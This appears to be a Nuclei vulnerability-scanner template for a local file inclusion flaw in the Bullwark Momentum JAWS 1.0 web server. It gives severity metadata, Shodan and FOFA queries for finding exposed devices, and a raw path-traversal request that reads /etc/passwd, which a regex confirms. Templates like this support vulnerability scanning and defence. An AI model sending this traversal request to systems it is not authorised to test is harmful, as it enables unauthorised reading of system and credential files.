id: bullwark-momentum-lfi

info:
  name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/47773
    - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    version: Bullwark Momentum Series Web Server JAWS/1.0
    shodan-query: Bullwark
    fofa-query: "Bullwark"
  tags: lfi,edb,bullwark

requests:
  - raw:
      - |
        GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        regex:
          - "root:.*:0:0:"

# Enhanced by mp on 2022/07/22
